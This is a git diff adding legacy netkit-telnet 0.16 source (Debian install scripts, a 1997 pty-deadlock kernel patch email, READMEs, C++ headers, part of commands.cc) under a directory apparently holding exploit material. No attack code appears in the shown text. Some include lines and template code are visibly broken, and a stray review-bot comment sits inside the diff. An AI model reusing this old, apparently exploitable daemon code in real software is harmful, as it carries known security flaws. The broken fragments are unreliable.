diff --git a/exploits/7350855-netkit/netkit-telnet-0.16/debian/telnetd.postinst b/exploits/7350855-netkit/netkit-telnet-0.16/debian/telnetd.postinst
new file mode 100644
index 0000000..6ff8f5c
--- /dev/null
+++ b/exploits/7350855-netkit/netkit-telnet-0.16/debian/telnetd.postinst
@@ -0,0 +1,45 @@
+#!/bin/sh -e
+# $Id: telnetd.postinst,v 1.9 2000/03/08 01:13:20 herbert Exp $
+
+if ! id -u telnetd >/dev/null 2>&1; then
+ if sg telnetd -c true 2>/dev/null; then
+ groupdel telnetd
+ fi
+ adduser --quiet --system --group --home /usr/lib/telnetd telnetd
+fi
+adduser --quiet telnetd utmp
+if [ -e /etc/suid.conf -a -x /usr/sbin/suidregister ]; then
+ suidregister -s telnetd /usr/lib/telnetd/login root telnetd 4754
+else
+ chown root.telnetd /usr/lib/telnetd/login
+ chmod 4754 /usr/lib/telnetd/login
+fi
+
+if grep -q "^devpts " /proc/mounts; then
+ REMOVE="telnet stream tcp nowait root /usr/sbin/tcpd /usr/sbin/in.telnetd"
+ ADD="telnet stream tcp nowait telnetd.telnetd /usr/sbin/tcpd /usr/sbin/in.telnetd"
+else
+ REMOVE="telnet stream tcp nowait telnetd.telnetd /usr/sbin/tcpd /usr/sbin/in.telnetd"
+ ADD="telnet stream tcp nowait root /usr/sbin/tcpd /usr/sbin/in.telnetd"
+fi
+
+case "$1" in
+abort-upgrade | abort-deconfigure | abort-remove)
+ update-inetd --enable telnet
+ ;;
+configure)
+ if [ -n "$2" ] && dpkg --compare-versions "$2" ge 0.14-1 &&
+ ! grep -q "^$REMOVE" /etc/inetd.conf; then
+ update-inetd --enable telnet
+ else
+ update-inetd --remove "$REMOVE"
+ update-inetd --group STANDARD --add "$ADD"
+ fi
+ ;;
+*)
+ printf "$0: incorrect arguments: $*\n" >&2
+ exit 1
+ ;;
+esac
+
+#DEBHELPER#
diff --git a/exploits/7350855-netkit/netkit-telnet-0.16/debian/telnetd.postrm b/exploits/7350855-netkit/netkit-telnet-0.16/debian/telnetd.postrm
new file mode 100644
index 0000000..cc0531c
--- /dev/null
+++ b/exploits/7350855-netkit/netkit-telnet-0.16/debian/telnetd.postrm
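Review bot: `printf "$0: incorrect arguments: $*\n" >&2` in telnetd.postinst hands shell variables to printf as the format string, so any `%` in the arguments is interpreted as a conversion; use `printf '%s: incorrect arguments: %s\n' "$0" "$*" >&2`, which also brings it in line with the `echo` form the postrm uses. `chown root.telnetd` relies on the deprecated dot separator; `chown root:telnetd` is the portable spelling. The `grep -q "^devpts " /proc/mounts` test silently decides whether in.telnetd is registered to run as root or as the telnetd user, and a one-line comment there stating that the unprivileged form requires devpts (as the 0.16-1 changelog entry explains) would make that privilege decision visible in the script itself.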
@@ -0,0 +1,29 @@
+#!/bin/sh -e
+# $Id: telnetd.postrm,v 1.6 1999/11/25 21:27:08 herbert Exp $
+
+if [ -e /etc/suid.conf -a -x /usr/sbin/suidunregister ]; then
+ suidunregister -s telnetd /usr/lib/telnetd/login
+fi
+
+case "$1" in
+abort-install | remove | abort-upgrade | upgrade | failed-upgrade | disappear)
+ ;;
+purge)
+ if id telnetd >/dev/null 2>&1; then
+ userdel telnetd
+ fi
+ if sg telnetd -c true 2>/dev/null; then
+ groupdel telnetd
+ fi
+ # If netbase is not installed, then we don't need to do the remove.
+ if command -v update-inetd >/dev/null 2>&1; then
+ update-inetd --remove "telnet .* /usr/sbin/in.telnetd"
+ fi
+ ;;
+*)
+ echo "$0: incorrect arguments: $*" >&2
+ exit 1
+ ;;
+esac
+
+#DEBHELPER#
diff --git a/exploits/7350855-netkit/netkit-telnet-0.16/debian/telnetd.prerm b/exploits/7350855-netkit/netkit-telnet-0.16/debian/telnetd.prerm
new file mode 100644
index 0000000..47a26d2
--- /dev/null
+++ b/exploits/7350855-netkit/netkit-telnet-0.16/debian/telnetd.prerm
@@ -0,0 +1,9 @@
+#!/bin/sh -e
+# $Id: telnetd.prerm,v 1.2 1999/08/27 10:45:45 herbert Exp $
+
+# If netbase is not installed, then we don't need to do the remove.
+if command -v update-inetd >/dev/null 2>&1; then
+ update-inetd --disable telnet
+fi
+
+#DEBHELPER#
diff --git a/exploits/7350855-netkit/netkit-telnet-0.16/pty-hang.patch b/exploits/7350855-netkit/netkit-telnet-0.16/pty-hang.patch
new file mode 100644
index 0000000..850f4b9
--- /dev/null
+++ b/exploits/7350855-netkit/netkit-telnet-0.16/pty-hang.patch
@@ -0,0 +1,99 @@ +From whawes@star.net Sun May 25 11:17:36 1997 +Received: from venus.star.net (root@venus.star.net [199.232.114.5]) by hcs.harvard.edu (8.8.5/8.8.3) with ESMTP id LAA15293 for ; Sun, 25 May 1997 11:17:35 -0400 (EDT) +Received: from hawes (bos221p.star.net [199.232.112.221]) by venus.star.net (8.8.5/8.7.3) with ESMTP id LAA29775; Sun, 25 May 1997 11:17:08 -0400 +Message-ID: <33885894.B2043F5E@star.net> +Date: Sun, 25 May 1997 11:19:48 -0400 +From: Bill Hawes +X-Mailer: Mozilla 4.0b3 [en] (WinNT; I) +MIME-Version: 1.0 +To: David Holland , + Alan Cox , + Peter Tobias , + "Theodore Ts'o" +Subject: kernel patch to fix telnetd deadlock +X-Priority: 3 (Normal) +Content-Type: multipart/mixed; boundary="------------B47A35BD86775A5D9DA0F308" +Status: RO + +This is a multi-part message in MIME format. +--------------B47A35BD86775A5D9DA0F308 +Content-Type: text/plain; charset=us-ascii +Content-Transfer-Encoding: 7bit + +Attached is a patch for drivers/char/n_tty.c that fixes the telnetd +deadlock when more than 256 chars are typed without a newline. With +this patch in place, the total of typed-ahead and entered commands is +still limited to 256 chars, but telnetd comes back to life when the +buffer is emptied. + +Here's what the problem was: +telnetd does a select() on the master side of a pty to see when it's +safe to write a character without blocking. + +The N_TTY line discipline select() calls the pty driver's +chars_in_buffer() function to see how many characters are buffered. +If there are more than 256, the caller has to wait. + +The pty driver.chars_in_buffer calls the other side's ldisc +chars_in_buffer() function. Here's where the problem arises: the slave +pty is in canonical mode, so that no characters can be read until a +newline is entered. But the n_tty_chars_in_buffer was returning the +full number of characters entered, even if no newline had been entered. 
+Hence after 256 characters were typed, select() makes telnetd wait, and +the newline can never arrive. + +The patch corrects n_tty_chars_in_buffer() by checking for canonical +mode and returning 0 if no data is available to be read. + +I've tested this on 2.0.30, and it should apply to 2.1.40 as well. +Please check it out and forward it as you see wish. + +I'm working on a patch for pty.c to allow a greater amount of type-ahead +while still avoiding a deadlock. + +Regards, +Bill Hawes +--------------B47A35BD86775A5D9DA0F308 +Content-Type: text/plain; charset=us-ascii; name="n_tty-chars-patch" +Content-Transfer-Encoding: 7bit +Content-Disposition: inline; filename="n_tty-chars-patch" + +--- drivers/char/n_tty.c.old Mon Sep 2 08:18:26 1996 ++++ drivers/char/n_tty.c Sun May 25 10:10:29 1997 +@@ -86,10 +86,31 @@ + + /* + * Return number of characters buffered to be delivered to user ++ * WSH 05/20/97: Added check for canonical mode ++ * In canonical mode, no characters are available to be read until ++ * the first newline has been entered. (Any characters in the buffer ++ * may yet be erased ...) ++ * ++ * This was causing a deadlock in telnetd: select() thought the buffer ++ * was already too full, so telnetd couldn't send a newline, but the ++ * slave PTY couldn't read anything because there was no newline. + */ + int n_tty_chars_in_buffer(struct tty_struct *tty) + { +- return tty->read_cnt; ++ /* Check first for canonical mode ... */ ++ if (tty->icanon) { ++ if (!tty->canon_data) return 0; ++ ++ /* Would prefer to just fall through and return the true ++ * count, but that could still cause deadlocks until some ++ * other routines are patched. For now, calculate the ++ * characters actually available for reading. ++ */ ++ return (tty->canon_head > tty->read_tail) ? 
++ tty->canon_head - tty->read_tail : ++ tty->canon_head + (N_TTY_BUF_SIZE - tty->read_tail); ++ } ++ return tty->read_cnt; /* all characters available */ + } + + /* + +--------------B47A35BD86775A5D9DA0F308-- + + diff --git a/exploits/7350855-netkit/netkit-telnet-0.16/telnet/Makefile b/exploits/7350855-netkit/netkit-telnet-0.16/telnet/Makefile new file mode 100644 index 0000000..cef866f --- /dev/null +++ b/exploits/7350855-netkit/netkit-telnet-0.16/telnet/Makefile @@ -0,0 +1,30 @@ +all: telnet + +include ../MCONFIG +include ../MRULES + +#CXXFLAGS:=$(patsubst -O2, -g, $(CXXFLAGS)) + +# -DAUTHENTICATE +CXXFLAGS += -DUSE_TERMIO -DKLUDGELINEMODE +LIBS += $(LIBTERMCAP) + +SRCS = commands.cc main.cc network.cc ring.cc sys_bsd.cc telnet.cc \ + terminal.cc tn3270.cc utilities.cc genget.cc environ.cc netlink.cc + +OBJS = $(patsubst %.cc, %.o, $(SRCS)) + +telnet: $(OBJS) + $(CXX) $(LDFLAGS) $^ $(LIBS) -o $@ + +include depend.mk +depend: + $(CXX) $(CXXFLAGS) -MM $(SRCS) >depend.mk + +install: telnet + install -s -m$(BINMODE) telnet $(INSTALLROOT)$(BINDIR) + install -m$(MANMODE) telnet.1 $(INSTALLROOT)$(MANDIR)/man1 + +clean: + rm -f *.o telnet + diff --git a/exploits/7350855-netkit/netkit-telnet-0.16/telnet/NetKit-B-0.06-telnet.patch b/exploits/7350855-netkit/netkit-telnet-0.16/telnet/NetKit-B-0.06-telnet.patch new file mode 100644 index 0000000..892423b --- /dev/null +++ b/exploits/7350855-netkit/netkit-telnet-0.16/telnet/NetKit-B-0.06-telnet.patch 
@@ -0,0 +1,27 @@ +diff -ur NetKit-B-0.06.orig/telnet/defines.h NetKit-B-0.06/telnet/defines.h +--- NetKit-B-0.06.orig/telnet/defines.h Fri Dec 17 07:18:16 1993 ++++ NetKit-B-0.06/telnet/defines.h Mon Jun 5 15:34:51 1995 +@@ -34,6 +34,10 @@ + * $Id: NetKit-B-0.06-telnet.patch,v 1.1 1996/07/16 05:17:22 dholland Exp $ + */ + ++#define ENV_VAR NEW_ENV_VAR ++#define ENV_VALUE NEW_ENV_VALUE ++#define TELOPT_ENVIRON TELOPT_NEW_ENVIRON ++ + #define settimer(x) clocks.x = clocks.system++ + + #if !defined(TN3270) +diff -ur NetKit-B-0.06.orig/telnetd/defs.h NetKit-B-0.06/telnetd/defs.h +--- NetKit-B-0.06.orig/telnetd/defs.h Mon May 23 09:11:57 1994 ++++ NetKit-B-0.06/telnetd/defs.h Mon Jun 5 15:34:39 1995 +@@ -40,6 +40,9 @@ + #include + #include + ++#define ENV_VAR NEW_ENV_VAR ++#define ENV_VALUE NEW_ENV_VALUE ++#define TELOPT_ENVIRON TELOPT_NEW_ENVIRON + + #ifndef BSD + # define BSD 43 diff --git a/exploits/7350855-netkit/netkit-telnet-0.16/telnet/README b/exploits/7350855-netkit/netkit-telnet-0.16/telnet/README new file mode 100644 index 0000000..cd18f9a --- /dev/null +++ b/exploits/7350855-netkit/netkit-telnet-0.16/telnet/README 
@@ -0,0 +1,26 @@ + +Telnet has been massively hacked up for this release. + +It presently requires a C++ compiler (gcc 2.7.2 or higher +recommended), but not libg++ or libstdc++. That is, unless you went to +special effort to not install the C++ compiler when you installed gcc, +you'll be fine. + +Large amounts of further hacking are expected. If you're interested in +working on it, please contact me, as diffs are likely to become +useless very quickly. + +Support for assorted old/broken systems has been dropped. Some such +support may be reinstated in the future once the code has been cleaned +up sufficiently. On the other hand, it may not. + +Known bugs/shortcomings at this point: + + - Under some circumstances it can theoretically encounter a + buffer overflow condition and drop data on the floor. If + anyone actually observes this ``in the wild'' I'd appreciate + knowing the circumstances. I'm also not convinced the old + behavior was any better. + - Various of the debug/trace modes don't work. This probably + doesn't matter to anyone not actually coding on it. + diff --git a/exploits/7350855-netkit/netkit-telnet-0.16/telnet/README.old b/exploits/7350855-netkit/netkit-telnet-0.16/telnet/README.old new file mode 100644 index 0000000..086c88f --- /dev/null +++ b/exploits/7350855-netkit/netkit-telnet-0.16/telnet/README.old 
@@ -0,0 +1,566 @@ + + +This is a distribution of both client and server telnet. These programs +have been compiled on: + telnet telnetd + BSD 4.3 Reno X X + UNICOS 5.1 X X + UNICOS 6.0 X X + UNICOS 6.1 X X + UNICOS 7.0 X X + SunOs 3.5 X X (no linemode in server) + SunOs 4.1 X X (no linemode in server) + DYNIX V3.0.17.9 X X (no linemode in server) + Ultrix 3.1 X X (no linemode in server) + Ultrix 4.0 X X (no linemode in server) + +In addition, previous versions have been compiled on the following +machines, but were not available for testing this version. + telnet telnetd + SunOs 4.0.3c X X (no linemode in server) + BSD 4.3 X X (no linemode in server) + DYNIX V3.0.12 X X (no linemode in server) + +Februrary 22, 1991: + + Features: + + This version of telnet/telnetd has support for both + the AUTHENTICATION and ENCRYPTION options. The + AUTHENTICATION option is fairly well defined, and + an option number has been assigned to it. The + ENCRYPTION option is still in a state of flux; an + option number has NOT been assigned to it yet. + The code is provided in this release for experimental + and testing purposes. + + The telnet "send" command can now be used to send + do/dont/will/wont commands, with any telnet option + name. The rules for when do/dont/will/wont are sent + are still followed, so just because the user requests + that one of these be sent doesn't mean that it will + be sent... + + The telnet "getstatus" command no longer requires + that option printing be enabled to see the response + to the "DO STATUS" command. + + A -n flag has been added to telnetd to disable + keepalives. + + A new telnet command, "auth" has been added (if + AUTHENTICATE is defined). It has four sub-commands, + "status", "debug", "disable", "enable" and "help". + + A new telnet command, "encrypt" has been added (if + ENCRYPT is defined). 
It has many sub-commands: + "enable", "type", "start", "stop", "input", + "-input", "output", "-output", "status", "auto", + "verbose", "debug", and "help". + + An "rlogin" interface has been added. If the program + is named "rlogin", or the "-r" flag is given, then + an rlogin type of interface will be used. + ~. Terminates the session + ~ Suspend the session + ~^] Escape to telnet command mode + ~~ Pass through the ~. + BUG: If you type the rlogin escape character + in the middle of a line while in rlogin + mode, you cannot erase it or any characters + before it. Hopefully this can be fixed + in a future release... + + General changes: + + A "libtelnet.a" has now been created. This libraray + contains code that is common to both telnet and + telnetd. This is also where library routines that + are needed, but are not in the standard C library, + are placed. + + The makefiles have been re-done. All of the site + specific configuration information has now been put + into a single "Config.generic" file, in the top level + directory. Changing this one file will take care of + all three subdirectories. Also, to add a new/local + definition, a "Config.local" file may be created + at the top level; if that file exists, the subdirectories + will use that file instead of "Config.generic". + + Many 1-2 line functions in commands.c have been + removed, and just inserted in-line, or replaced + with a macro. + + Bug Fixes: + + The non-termio code in both telnet and telnetd was + setting/clearing CTLECH in the sg_flags word. This + was incorrect, and has been changed to set/clear the + LCTLECH bit in the local mode word. + + The SRCRT #define has been removed. If IP_OPTIONS + and IPPROTO_IP are defined on the system, then the + source route code is automatically enabled. + + The NO_GETTYTAB #define has been removed; there + is a compatability routine that can be built into + libtelnet to achive the same results. 
+ + The server, telnetd, has been switched to use getopt() + for parsing the argument list. + + The code for getting the input/output speeds via + cfgetispeed()/cfgetospeed() was still not quite + right in telnet. Posix says if the ispeed is 0, + then it is really equal to the ospeed. + + The suboption processing code in telnet now has + explicit checks to make sure that we received + the entire suboption (telnetd was already doing this). + + The telnet code for processing the terminal type + could cause a core dump if an existing connection + was closed, and a new connection opened without + exiting telnet. + + Telnetd was doing a TCSADRAIN when setting the new + terminal settings; This is not good, because it means + that the tcsetattr() will hang waiting for output to + drain, and telnetd is the only one that will drain + the output... The fix is to use TCSANOW which does + not wait. + + Telnetd was improperly setting/clearing the ISTRIP + flag in the c_lflag field, it should be using the + c_iflag field. + + When the child process of telnetd was opening the + slave side of the pty, it was re-setting the EXTPROC + bit too early, and some of the other initialization + code was wiping it out. This would cause telnetd + to go out of linemode and into single character mode. + + One instance of leaving linemode in telnetd forgot + to send a WILL ECHO to the client, the net result + would be that the user would see double character + echo. + + If the MODE was being changed several times very + quickly, telnetd could get out of sync with the + state changes and the returning acks; and wind up + being left in the wrong state. + +September 14, 1990: + + Switch the client to use getopt() for parsing the + argument list. The 4.3Reno getopt.c is included for + systems that don't have getopt(). + + Use the posix _POSIX_VDISABLE value for what value + to use when disabling special characters. If this + is undefined, it defaults to 0x3ff. 
+
+ For non-termio systems, TIOCSETP was being used to
+ change the state of the terminal. This causes the
+ input queue to be flushed, which we don't want. This
+ is now changed to TIOCSETN.
+
+ Take out the "#ifdef notdef" around the code in the
+ server that generates a "sync" when the pty oputput
+ is flushed. The potential problem is that some older
+ telnet clients may go into an infinate loop when they
+ receive a "sync", if so, the server can be compiled
+ with "NO_URGENT" defined.
+
+ Fix the client where it was setting/clearing the OPOST
+ bit in the c_lflag field, not the c_oflag field.
+
+ Fix the client where it was setting/clearing the ISTRIP
+ bit in the c_lflag field, not the c_iflag field. (On
+ 4.3Reno, this is the ECHOPRT bit in the c_lflag field.)
+ The client also had its interpretation of WILL BINARY
+ and DO BINARY reversed.
+
+ Fix a bug in client that would cause a core dump when
+ attempting to remove the last environment variable.
+
+ In the client, there were a few places were switch()
+ was being passed a character, and if it was a negative
+ value, it could get sign extended, and not match
+ the 8 bit case statements. The fix is to and the
+ switch value with 0xff.
+
+ Add a couple more printoption() calls in the client, I
+ don't think there are any more places were a telnet
+ command can be received and not printed out when
+ "options" is on.
+
+ A new flag has been added to the client, "-a". Currently,
+ this just causes the USER name to be sent across, in
+ the future this may be used to signify that automatic
+ authentication is requested.
+
+ The USER variable is now only sent by the client if
+ the "-a" or "-l user" options are explicity used, or
+ if the user explicitly asks for the "USER" environment
+ variable to be exported. In the server, if it receives
+ the "USER" environment variable, it won't print out the
+ banner message, so that only "Password:" will be printed.
+ This makes the symantics more like rlogin, and should be
+ more familiar to the user. (People are not used to
+ getting a banner message, and then getting just a
+ "Password:" prompt.)
+
+ Re-vamp the code for starting up the child login
+ process. The code was getting ugly, and it was
+ hard to tell what was really going on. What we
+ do now is after the fork(), in the child:
+ 1) make sure we have no controlling tty
+ 2) open and initialize the tty
+ 3) do a setsid()/setpgrp()
+ 4) makes the tty our controlling tty.
+ On some systems, #2 makes the tty our controlling
+ tty, and #4 is a no-op. The parent process does
+ a gets rid of any controlling tty after the child
+ is fork()ed.
+
+ Use the strdup() library routine in telnet, instead
+ of the local savestr() routine. If you don't have
+ strdup(), you need to define NO_STRDUP.
+
+ Add support for ^T (SIGINFO/VSTATUS), found in the
+ 4.3Reno distribution. This maps to the AYT character.
+ You need a 4-line bugfix in the kernel to get this
+ to work properly:
+
+ > *** tty_pty.c.ORG Tue Sep 11 09:41:53 1990
+ > --- tty_pty.c Tue Sep 11 17:48:03 1990
+ > ***************
+ > *** 609,613 ****
+ > if ((tp->t_lflag&NOFLSH) == 0)
+ > ttyflush(tp, FREAD|FWRITE);
+ > ! pgsignal(tp->t_pgrp, *(unsigned int *)data);
+ > return(0);
+ > }
+ > --- 609,616 ----
+ > if ((tp->t_lflag&NOFLSH) == 0)
+ > ttyflush(tp, FREAD|FWRITE);
+ > ! pgsignal(tp->t_pgrp, *(unsigned int *)data, 1);
+ > ! if ((*(unsigned int *)data == SIGINFO) &&
+ > ! ((tp->t_lflag&NOKERNINFO) == 0))
+ > ! ttyinfo(tp);
+ > return(0);
+ > }
+
+ The client is now smarter when setting the telnet escape
+ character; it only sets it to one of VEOL and VEOL2 if
+ one of them is undefined, and the other one is not already
+ defined to the telnet escape character.
+
+ Handle TERMIOS systems that have seperate input and output
+ line speed settings imbedded in the flags.
+
+ Many other minor bug fixes.
+
+June 20, 1990:
+ Re-organize makefiles and source tree. The telnet/Source
+ directory is now gone, and all the source that was in
+ telnet/Source is now just in the telnet directory.
+
+ Seperate makefile for each system are now gone. There
+ are two makefiles, Makefile and Makefile.generic.
+ The "Makefile" has the definitions for the various
+ system, and "Makefile.generic" does all the work.
+ There is a variable called "WHAT" that is used to
+ specify what to make. For example, in the telnet
+ directory, you might say:
+ make 4.4bsd WHAT=clean
+ to clean out the directory.
+
+ Add support for the ENVIRON and XDISPLOC options.
+ In order for the server to work, login has to have
+ the "-p" option to preserve environment variables.
+
+ Add the SOFT_TAB and LIT_ECHO modes in the LINEMODE support.
+
+ Add the "-l user" option to command line and open command
+ (This is passed through the ENVIRON option).
+
+ Add the "-e" command line option, for setting the escape
+ character.
+
+ Add the "-D", diagnostic, option to the server. This allows
+ the server to print out debug information, which is very
+ useful when trying to debug a telnet that doesn't have any
+ debugging ability.
+
+ Turn off the literal next character when not in LINEMODE.
+
+ Don't recognize ^Y locally, just pass it through.
+
+ Make minor modifications for Sun4.0 and Sun4.1
+
+ Add support for both FORW1 and FORW2 characters. The
+ telnet escpape character is set to whichever of the
+ two is not being used. If both are in use, the escape
+ character is not set, so when in linemode the user will
+ have to follow the escape character with a or
+
+
+The following TELNET options are supported:
+
+ LINEMODE:
+ The LINEMODE option is supported as per RFC1116. The
+ FORWARDMASK option is not currently supported.
+
+ BINARY: The client has the ability to turn on/off the BINARY
+ option in each direction. Turning on BINARY from
+ server to client causes the LITOUT bit to get set in
+ the terminal driver on both ends, turning on BINARY
+ from the client to the server causes the PASS8 bit
+ to get set in the terminal driver on both ends.
+
+ TERMINAL-TYPE:
+ This is supported as per RFC1091. On the server side,
+ when a terminal type is received, termcap/terminfo
+ is consulted to determine if it is a known terminal
+ type. It keeps requesting terminal types until it
+ gets one that it recongnizes, or hits the end of the
+ list. The server side looks up the entry in the
+ termcap/terminfo data base, and generates a list of
+ names which it then passes one at a time to each
+ request for a terminal type, duplicating the last
+ entry in the list before cycling back to the beginning.
+
+ NAWS: The Negotiate about Window Size, as per RFC 1073.
+
+ TERMINAL-SPEED:
+ Implemented as per RFC 1079
+
+ TOGGLE-FLOW-CONTROL:
+ Implemented as per RFC 1080
+
+ TIMING-MARK:
+ As per RFC 860
+
+ SGA: As per RFC 858
+
+ ECHO: As per RFC 857
+
+ STATUS:
+ The server will send its current status upon
+ request. It does not ask for the clients status.
+ The client will request the servers current status
+ from the "send getstatus" command.
+
+ ENVIRON:
+ This option is currently being defined by the IETF
+ Telnet Working Group, and an RFC has not yet been
+ issued, but should be in the near future...
+
+ X-DISPLAY-LOCATION:
+ This functionality can be done through the ENVIRON
+ option, it is added here for completeness.
+
+ AUTHENTICATION:
+ This option is currently being defined by the IETF
+ Telnet Working Group, and an RFC has not yet been
+ issued. The basic framework is pretty much decided,
+ but the definitions for the specific authentication
+ schemes is still in a state of flux.
+
+ ENCRYPT:
+ This option is currently being defined by the IETF
+ Telnet Working Group, and an RFC has not yet been
+ issued. The draft RFC is still in a state of flux,
+ so this code may change in the future.
diff --git a/exploits/7350855-netkit/netkit-telnet-0.16/telnet/TODO b/exploits/7350855-netkit/netkit-telnet-0.16/telnet/TODO
new file mode 100644
index 0000000..f67f253
--- /dev/null
+++ b/exploits/7350855-netkit/netkit-telnet-0.16/telnet/TODO
@@ -0,0 +1,13 @@
+eliminate global variables
+ clean up command processing
+ fix "send" command
+ clean up option processing
+
+add empty encrypt hooks (layer over ring buffers)
+flushout --> use nullsink
+
+fix ring buffer so it allocates more buf instead of overflowing
+
+put tracing back in
+
+authentication?
diff --git a/exploits/7350855-netkit/netkit-telnet-0.16/telnet/array.h b/exploits/7350855-netkit/netkit-telnet-0.16/telnet/array.h
new file mode 100644
index 0000000..56f1123
--- /dev/null
+++ b/exploits/7350855-netkit/netkit-telnet-0.16/telnet/array.h
@@ -0,0 +1,97 @@
+//
+// File: array.h
+// Date: 16-Jul-95
+// Description: array template
+//
+/*
+ * Copyright (c) 1995 David A. Holland.
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ * notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ * notice, this list of conditions and the following disclaimer in the
+ * documentation and/or other materials provided with the distribution.
+ * 3. Neither the name of the Author nor the names of any contributors
+ * may be used to endorse or promote products derived from this software
+ * without specific prior written permission.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ */ + +#ifndef ARRAY_H +#define ARRAY_H + +#ifndef assert +#include +#endif + +#ifndef NULL +#define NULL 0 +#endif + +inline void *operator new(size_t, void *v) { return v; } + +template +class array { + protected: + T *v; + int n, max; + + void reallocto(int newsize) { + while (maxmax) reallocto(newsize); + if (newsize>n) { + // call default constructors + for (int i=n; i=0 && ix +#include +#include +#include + +#include "ring.h" +#include "externs.h" +#include "defines.h" +#include "types.h" +#include "proto.h" + + int +net_write(str, len) + unsigned char *str; + int len; +{ + if (NETROOM() > len) { + netoring.supply_data(str, len); + if (str[0] == IAC && str[1] == SE) + printsub('>', &str[2], len-2); + return(len); + } + return(0); +} + + void +net_encrypt() +{ +#if defined(ENCRYPT) + if (encrypt_output) + ring_encrypt(&netoring, encrypt_output); + else + ring_clearto(&netoring); +#endif +} + + int +telnet_spin() +{ + return(-1); +} + + char * +telnet_getenv(val) + char *val; +{ + return((char *)env_getvalue((unsigned char *)val)); +} + + char * +telnet_gets(prompt, result, length, echo) + char *prompt; + char *result; + int length; + int echo; +{ + extern char *getpass(); + extern int globalmode; + int om = globalmode; + char *res; + + TerminalNewMode(-1); + if (echo) { + printf("%s", prompt); + res = fgets(result, length, stdin); + } + else if ((res = getpass(prompt))!=NULL) { + strncpy(result, res, length); + res = result; + } + TerminalNewMode(om); + return(res); +} +#endif diff --git a/exploits/7350855-netkit/netkit-telnet-0.16/telnet/commands.cc b/exploits/7350855-netkit/netkit-telnet-0.16/telnet/commands.cc new file mode 100644 index 0000000..b3a2a3c --- /dev/null +++ b/exploits/7350855-netkit/netkit-telnet-0.16/telnet/commands.cc 
@@ -0,0 +1,2233 @@
+/*
+ * Copyright (c) 1988, 1990 Regents of the University of California.
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ * notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ * notice, this list of conditions and the following disclaimer in the
+ * documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ * must display the following acknowledgement:
+ * This product includes software developed by the University of
+ * California, Berkeley and its contributors.
+ * 4. Neither the name of the University nor the names of its contributors
+ * may be used to endorse or promote products derived from this software
+ * without specific prior written permission.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ */
+
+/*
+ * From: @(#)commands.c 5.5 (Berkeley) 3/22/91
+ */
+char cmd_rcsid[] =
+ "$Id: commands.cc,v 1.32 1999/09/28 16:29:24 dholland Exp $";
+
+#include
+
+#include
+#include
+#include
+#include
+#include
+#include
+
+#ifdef CRAY
+#include
+#endif /* CRAY */
+
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+#include "ring.h"
+
+#include "externs.h"
+#include "defines.h"
+#include "types.h"
+#include "genget.h"
+#include "environ.h"
+#include "proto.h"
+#include "ptrarray.h"
+#include "netlink.h"
+
+#ifdef __linux__
+#define HAS_IPPROTO_IP
+#endif
+
+#ifdef IPPROTO_IP
+#define HAS_IPPROTO_IP
+#endif
+
+#ifndef CRAY
+#if (defined(vax) || defined(tahoe) || defined(hp300)) && !defined(ultrix)
+#include
+#endif /* vax */
+#endif /* CRAY */
+
+#define HELPINDENT ((int) sizeof ("connect"))
+
+#if defined(HAS_IPPROTO_IP) && defined(IP_TOS)
+int tos = -1;
+#endif /* defined(HAS_IPPROTO_IP) && defined(IP_TOS) */
+
+static unsigned long sourceroute(char *arg, char **cpp, int *lenp);
+
+
+char *hostname;
+static char *_hostname;
+
+//typedef int (*intrtn_t)(int argc, const char *argv[]);
+
+class command_entry;
+typedef ptrarray command_table;
+
+static int process_command(command_table *tab, int argc, const char **argv);
+
+
+class command_entry {
+ protected:
+ const char *name; /* command name */
+ const char *help; /* help string (NULL for no help) */
+
+ int nargs;
+ union { /* routine which executes command */
+ command_table *subhandler;
+ int (*handlern)(int, const char **);
+ int (*handler0)(void);
+ int (*handler1)(const char *);
